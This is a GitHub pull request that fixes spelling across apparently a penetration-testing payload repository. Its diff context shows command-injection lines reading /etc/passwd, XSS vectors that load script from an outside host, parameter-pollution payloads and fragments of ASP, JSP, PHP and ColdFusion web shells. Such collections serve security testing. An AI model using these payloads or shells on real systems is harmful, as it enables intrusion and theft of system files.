Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Spelling #201

Open
wants to merge 59 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
59 commits
Select commit Hold shift + click to select a range
6479e7a
spelling: access
jsoref Sep 6, 2021
c9ec26c
spelling: adds
jsoref Sep 6, 2021
494e974
spelling: advise
jsoref Sep 3, 2021
310c884
spelling: algorithm
jsoref Sep 6, 2021
570487a
spelling: assassinate
jsoref Sep 6, 2021
f065b00
spelling: attribute
jsoref Sep 6, 2021
5bbe06b
spelling: available
jsoref Sep 6, 2021
9fb8d8a
spelling: change
jsoref Sep 6, 2021
27d8c02
spelling: circuit
jsoref Sep 6, 2021
e99b41d
spelling: columns
jsoref Sep 6, 2021
1a26a10
spelling: coming
jsoref Sep 6, 2021
ee56373
spelling: command
jsoref Sep 6, 2021
73b1ce0
spelling: contains
jsoref Sep 6, 2021
86550ec
spelling: daemonization
jsoref Sep 6, 2021
a8b1342
spelling: daemonize
jsoref Sep 6, 2021
640d5fb
spelling: developed
jsoref Sep 6, 2021
336f77d
spelling: directory
jsoref Sep 6, 2021
d26155f
spelling: division
jsoref Sep 6, 2021
84275a9
spelling: escape
jsoref Sep 6, 2021
fc511bd
spelling: evaluate
jsoref Sep 6, 2021
4e5dcea
spelling: execute
jsoref Sep 6, 2021
500783d
spelling: extension
jsoref Sep 6, 2021
a01fa8e
spelling: forwarded
jsoref Sep 6, 2021
d346ea4
spelling: generate
jsoref Sep 6, 2021
05db824
spelling: handler
jsoref Sep 6, 2021
fc48bd7
spelling: libraries
jsoref Sep 6, 2021
c7420ac
spelling: obfuscated
jsoref Sep 6, 2021
c20899c
spelling: occasionally
jsoref Sep 6, 2021
b757f4f
spelling: operator
jsoref Sep 6, 2021
56796d1
spelling: parameter
jsoref Sep 6, 2021
21cd503
spelling: parameters
jsoref Sep 6, 2021
884e5e6
spelling: pollution
jsoref Sep 6, 2021
1d109ed
spelling: popularity
jsoref Sep 6, 2021
49ca85b
spelling: possible
jsoref Sep 6, 2021
e780f8f
spelling: postgre
jsoref Sep 6, 2021
9cdf482
spelling: present
jsoref Sep 6, 2021
e5d24d6
spelling: privacy
jsoref Sep 6, 2021
e844ace
spelling: program
jsoref Sep 6, 2021
1042280
spelling: quote
jsoref Sep 6, 2021
fbe6306
spelling: registered
jsoref Sep 6, 2021
01d777f
spelling: reproducibility
jsoref Sep 6, 2021
02e940e
spelling: retrieve
jsoref Sep 6, 2021
ded7111
spelling: rudimentary
jsoref Sep 6, 2021
8668b78
spelling: secret
jsoref Sep 6, 2021
26956a6
spelling: select all
jsoref Sep 6, 2021
de175d0
spelling: self-contained
jsoref Sep 6, 2021
35cce88
spelling: separated
jsoref Sep 6, 2021
523b25b
spelling: separator
jsoref Sep 6, 2021
95a03ae
spelling: should
jsoref Sep 6, 2021
e94df76
spelling: similar
jsoref Sep 6, 2021
d890058
spelling: situations
jsoref Sep 6, 2021
73e47ae
spelling: specified
jsoref Sep 6, 2021
10f02c5
spelling: spetsnaz
jsoref Sep 6, 2021
6c4d0df
spelling: suppress
jsoref Sep 6, 2021
dc04811
spelling: suspicious
jsoref Sep 6, 2021
86e0850
spelling: temporarily
jsoref Sep 6, 2021
8af8a26
spelling: useful
jsoref Sep 6, 2021
6087f36
spelling: verification
jsoref Sep 6, 2021
6a4b70d
spelling: where
jsoref Sep 6, 2021
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion attack/file-upload/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@ see: http://cwe.mitre.org/data/definitions/434.html

* kinds of file upload verifications:
* content-type
* filename extension verificationi (whitelist, blacklist)
* filename extension verification (whitelist, blacklist)
* file content checking
* client side, ha ha ha

Expand Down
2 changes: 1 addition & 1 deletion attack/http-protocol/hpp.txt
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
# HTTP parameter pollution and interpretation payloads by Jacco van Tuijl
?id=id=1
&id=1?id=2
?id['&id=1']=2
Expand Down
4 changes: 2 additions & 2 deletions attack/os-cmd-execution/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -30,14 +30,14 @@ Example IFS netcat backdoor without spaces:<br>

$IFS shell variable:<br>
``` cat$IFS/etc/passwd ```<br>
increment the first +1 to retreive the entire file, line by line<br>
increment the first +1 to retrieve the entire file, line by line<br>
``` cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1 ```

Shell Variables:<br>
``` CMD=$'cat\x20/etc/passwd';$CMD ```

shell variable, increment through file one line at a time: <br>
increment the first +1 to retreive the entire file, line by line<br>
increment the first +1 to retrieve the entire file, line by line<br>
``` SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1 ```

**Exfiltrating Files / Data**
Expand Down
2 changes: 1 addition & 1 deletion attack/sql-injection/exploit/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@ various useful post-exploitation commands
**mysql-injection-login-bypass.fuzz.txt**
* regex replace as many as you can with your fuzzer for best results:
* <user-fieldname> <pass-fieldname> <username>
* also try to brute force a list of possible usernames, including possile admin acct names
* also try to brute force a list of possible usernames, including possible admin acct names

**mysql-read-local-files.fuzz.txt**
* mysql local file disclosure through sqli
Expand Down
20 changes: 10 additions & 10 deletions attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
Original file line number Diff line number Diff line change
Expand Up @@ -427,7 +427,7 @@ Author Name: ha.ckers.org
Extraneous Open Brackets
Exploit Name: Extraneous Open Brackets
Exploit String: <<SCRIPT>alert("XSS");//<</SCRIPT>
Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.
Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error.
Exploit Tags: general, obfuscated
Author Name: ha.ckers.org

Expand Down Expand Up @@ -518,8 +518,8 @@ Exploit Description: HTML entities (the semicolons are required for this to work
Exploit Tags: general, evil tags, obfuscated, internet explorer
Author Name: ha.ckers.org

HTML Quoute & Comment breaker
Exploit Name: HTML Quoute & Comment breaker
HTML Quote & Comment breaker
Exploit Name: HTML Quote & Comment breaker
Exploit String: '';!--"<script>alert(0);</script>=&{(alert(1))}
Exploit Description: This vector breaks HTML quotes and comments.
Exploit Tags: general, html breaking, comment breaking
Expand Down Expand Up @@ -547,7 +547,7 @@ Author Name: .mario
IE closing-tag expression injection
Exploit Name: IE closing-tag expression injection
Exploit String: </a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
Exploit Description: This vector exploits a bug in IE whre attributes in closing comments are evaluated.
Exploit Description: This vector exploits a bug in IE where attributes in closing comments are evaluated.
Exploit Tags: general, injection, internet explorer
Author Name: .mario

Expand Down Expand Up @@ -581,7 +581,7 @@ Exploit String: a=<a>
</b>
</a>
document.write(unescape(a..b))
Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context.
Exploit Description: This vector writes an erroneous image tag with onerror handler inside an E4X construct into the document context.
Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags
Author Name: .mario

Expand Down Expand Up @@ -865,7 +865,7 @@ Author Name: ha.ckers.org
Mozilla -moz-binding-url injection
Exploit Name: Mozilla -moz-binding-url injection
Exploit String: style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only.
Exploit Description: The vector incudes a binding file via injected style attribute. Gecko only.
Exploit Tags: general, injection, gecko, style injection, XBL
Author Name: .mario

Expand All @@ -876,8 +876,8 @@ Exploit Description: This vector was once used on a major site to evade a stripp
Exploit Tags: general, injection, gecko, style injection, XBL
Author Name: PHPIDS Group

Multiline selfcontained XSS
Exploit Name: Multiline selfcontained XSS
Multiline self-contained XSS
Exploit Name: Multiline self-contained XSS
Exploit String: _
=
eval
Expand Down Expand Up @@ -1274,7 +1274,7 @@ Author Name: PHPIDS Group
Self-contained XSS variant 2
Exploit Name: Self-contained XSS variant 2
Exploit String: a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
Exploit Description: Concatenates fragmented functions to evakuate the location hash
Exploit Description: Concatenates fragmented functions to evaluate the location hash
Exploit Tags: general, self contained
Author Name: PHPIDS Group

Expand Down Expand Up @@ -1366,7 +1366,7 @@ content: “\61\6c\65\72\74\28\31\29″
eval(eval(document.styleSheets[0].cssRules[0].style.content))
</script>
Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed.
Exploit Tags: general, onfuscated, style injection
Exploit Tags: general, obfuscated, style injection
Author Name: .mario

STYLE w/Anonymous HTML
Expand Down
4 changes: 2 additions & 2 deletions discovery/WebSocket/WebSocket-subprotocols.txt
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
# this list can be used to enumerate supported Web Socket sub protocols of a web socket server
# It conyains the official IANA registerd Web Socket sub protocols
# It contains the official IANA registered Web Socket sub protocols
# Source: https://www.iana.org/assignments/websocket/websocket.xml
# Example subprotocol request header:
# Sec-WebSocket-Protocol: mqtt, wamp
# The Web Socket client can include a list of the protocols when making the initial HTTP request.
# The server is then required to either select one of those protocols and include it in a response header.
# If none of the sub protocols send by the client are supported by the server,
# the server shoud fail the handshake and terminate the connection.
# the server should fail the handshake and terminate the connection.
MBWS.huawei.com
MBLWS.huawei.com
soap
Expand Down
16 changes: 8 additions & 8 deletions docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html

Large diffs are not rendered by default.

4 changes: 2 additions & 2 deletions docs/misc/KL0209LIT_fffap.html
Original file line number Diff line number Diff line change
Expand Up @@ -89,7 +89,7 @@

Fuzzing includes a lot of testing. You could spend hours and hours modifying and compiling and running the same but slightly
different code over and over just to get the better results. Planning, preparation, and testing are a part of fuzzing, and
laboring hours on end for the humble task of perfection, stability, and reproduceability can thankfully be very rewarding.
laboring hours on end for the humble task of perfection, stability, and reproducibility can thankfully be very rewarding.

Fuzzing is useful because...

Expand Down Expand Up @@ -569,7 +569,7 @@
3.2 Writing the Fuzzer

This example for SFTP fuzzing will be written in PERL and will be using libssh2/Net::SSH2 (this is not the only way to use
and fuzz SFTP, other libaries and extensions that may be more extensive and/or low-level are available).
and fuzz SFTP, other libraries and extensions that may be more extensive and/or low-level are available).

[sftpfuzz.pl]

Expand Down
10 changes: 5 additions & 5 deletions regex/nsa-wordlist.txt
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@ Information Security
Information Warfare
IW
IS
Priavacy Information
Privacy Information
Terrorism
Defensive
Information Defense
Expand Down Expand Up @@ -36,7 +36,7 @@ CIA
S/Key
SSL
FBI
Secert Service
Secret Service
USSS
Defcon
Military
Expand Down Expand Up @@ -212,7 +212,7 @@ MI6
Kh-11
Shayet-13
SADMS
Spetznaz
Spetsnaz
Recce
707
CIO
Expand Down Expand Up @@ -663,7 +663,7 @@ COS
E.T.
credit card fraud
b9
assasinate
assassinate
virus
anarchy
rogue
Expand Down Expand Up @@ -1008,6 +1008,6 @@ China
Conficker
Worm
Scammers
Suspecious
Suspicious
Social media

6 changes: 3 additions & 3 deletions web-backdoors/asp/cmdasp.aspx
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
string ExecuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
Expand All @@ -21,7 +21,7 @@ return s;
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write(Server.HtmlEncode(ExecuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
Expand All @@ -32,7 +32,7 @@ Response.Write("</pre>");
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
Expand Down
2 changes: 1 addition & 1 deletion web-backdoors/asp/file.asp
Original file line number Diff line number Diff line change
Expand Up @@ -116,7 +116,7 @@ end if

<%
' get the path to work with, if it isn't set or valid then start with the web root
' goofy if statement is used since vbscript doesn't use short-curcuit logic
' goofy if statement is used since vbscript doesn't use short-circuit logic
path = trim(Request.QueryString("path"))
if len(path) = 0 then
path = fso.GetFolder(Server.MapPath("\"))
Expand Down
8 changes: 4 additions & 4 deletions web-backdoors/asp/ntdaddy.asp
Original file line number Diff line number Diff line change
Expand Up @@ -101,7 +101,7 @@ FileAttributes = "Volume"
case 16
FileAttributes = "Directory"
case 19
FileAttributes = "Read Only, Hidden, Directoy"
FileAttributes = "Read Only, Hidden, Directory"
case 23
FileAttributes = "Read Only, Hidden, System, Directory"
case 32
Expand Down Expand Up @@ -188,7 +188,7 @@ FolderAttributes = "Read Only, Directory"
case 18 'Extra
FolderAttributes = "Hidden, Directory"
case 19
FolderAttributes = "Read Only, Hidden, Directoy"
FolderAttributes = "Read Only, Hidden, Directory"
case 20 'Extra
FolderAttributes = "System, Directory"
case 22 'Extra
Expand Down Expand Up @@ -489,7 +489,7 @@ FolderAttributes = "Read Only, Directory"
case 18 'Extra
FolderAttributes = "Hidden, Directory"
case 19
FolderAttributes = "Read Only, Hidden, Directoy"
FolderAttributes = "Read Only, Hidden, Directory"
case 20 'Extra
FolderAttributes = "System, Directory"
case 22 'Extra
Expand Down Expand Up @@ -600,7 +600,7 @@ FileAttributes = "Volume"
case 16
FileAttributes = "Directory"
case 19
FileAttributes = "Read Only, Hidden, Directoy"
FileAttributes = "Read Only, Hidden, Directory"
case 23
FileAttributes = "Read Only, Hidden, System, Directory"
case 32
Expand Down
2 changes: 1 addition & 1 deletion web-backdoors/asp/proxy.asp
Original file line number Diff line number Diff line change
Expand Up @@ -130,7 +130,7 @@ Dim r
r.IgnoreCase = true
r.Global = true

' remove the laudurl paramater
' remove the laudurl parameter
r.Pattern = "laudurl=[^&]+($|&)"
CleanFormValues = r.Replace(request.form, "")
Set r = nothing
Expand Down
2 changes: 1 addition & 1 deletion web-backdoors/asp/shell.aspx
Original file line number Diff line number Diff line change
Expand Up @@ -57,7 +57,7 @@ void Page_Load(object sender, System.EventArgs e) {
// Check for an IP in the range we want
string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};

// check if the X-Fordarded-For header exits
// check if the X-Forwarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
Expand Down
2 changes: 1 addition & 1 deletion web-backdoors/cfm/shell.cfm
Original file line number Diff line number Diff line change
Expand Up @@ -18,7 +18,7 @@
***
********************************************************************************
***
*** This file provides access to shell acces on the system.
*** This file provides access to shell access on the system.
*** Modified by Tim Medin
*** Modified by Matt Presson <@matt_presson>
*** - Added some basic authentication via HTTP header
Expand Down
12 changes: 6 additions & 6 deletions web-backdoors/jsp/browser.jsp
Original file line number Diff line number Diff line change
Expand Up @@ -34,13 +34,13 @@
//If true, the user is allowed to browse only in RESTRICT_PATH,
//if false, the user is allowed to browse all directories besides RESTRICT_PATH
private static final boolean RESTRICT_WHITELIST = false;
//Paths, sperated by semicolon
//Paths, separated by semicolon
//private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
private static final String RESTRICT_PATH = "/etc;/var";

//The refresh time in seconds of the upload monitor window
private static final int UPLOAD_MONITOR_REFRESH = 2;
//The number of colums for the edit field
//The number of columns for the edit field
private static final int EDITFIELD_COLS = 85;
//The number of rows for the edit field
private static final int EDITFIELD_ROWS = 30;
Expand All @@ -66,14 +66,14 @@
*/
private static final int COMPRESSION_LEVEL = 1;
/**
* The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
* The FORBIDDEN_DRIVES are not displayed on the list. This can be useful, if the
* server runs on a windows platform, to avoid a message box, if you try to access
* an empty removable drive (See KNOWN BUGS in Readme.txt).
*/
private static final String[] FORBIDDEN_DRIVES = {"a:\\"};

/**
* Command of the shell interpreter and the parameter to run a programm
* Command of the shell interpreter and the parameter to run a program
*/
private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix
Expand Down Expand Up @@ -1570,7 +1570,7 @@ Upload finished.
for(var x=0;x<document.FileList.elements.length;x++){
var y = document.FileList.elements[x];
var ytr = y.parentNode.parentNode;
var check = document.FileList.selall.checked;
var check = document.FileList.selectAll.checked;
if(y.name == 'selfile'){
if (y.disabled != true){
y.checked = check;
Expand Down Expand Up @@ -1754,7 +1754,7 @@ Upload finished.
}
}%>
</table>
<input type="checkbox" name="selall" onClick="AllFiles(this.form)">Select all
<input type="checkbox" name="selectAll" onClick="AllFiles(this.form)">Select all
<p align=center>
<b title="<%=totalSize%> bytes">
<%=convertFileSize(totalSize)%></b><b> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%>
Expand Down
2 changes: 1 addition & 1 deletion web-backdoors/php/dns.php
Original file line number Diff line number Diff line change
Expand Up @@ -60,7 +60,7 @@
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
/* The @-operator (used with chdir() below) temporarily makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
Expand Down
2 changes: 1 addition & 1 deletion web-backdoors/php/file.php
Original file line number Diff line number Diff line change
Expand Up @@ -61,7 +61,7 @@
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
/* The @-operator (used with chdir() below) temporarily makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
Expand Down
2 changes: 1 addition & 1 deletion web-backdoors/php/host.php
Original file line number Diff line number Diff line change
Expand Up @@ -59,7 +59,7 @@
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
/* The @-operator (used with chdir() below) temporarily makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
Expand Down
2 changes: 1 addition & 1 deletion web-backdoors/php/killnc.php
Original file line number Diff line number Diff line change
Expand Up @@ -62,7 +62,7 @@
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
/* The @-operator (used with chdir() below) temporarily makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
Expand Down
Loading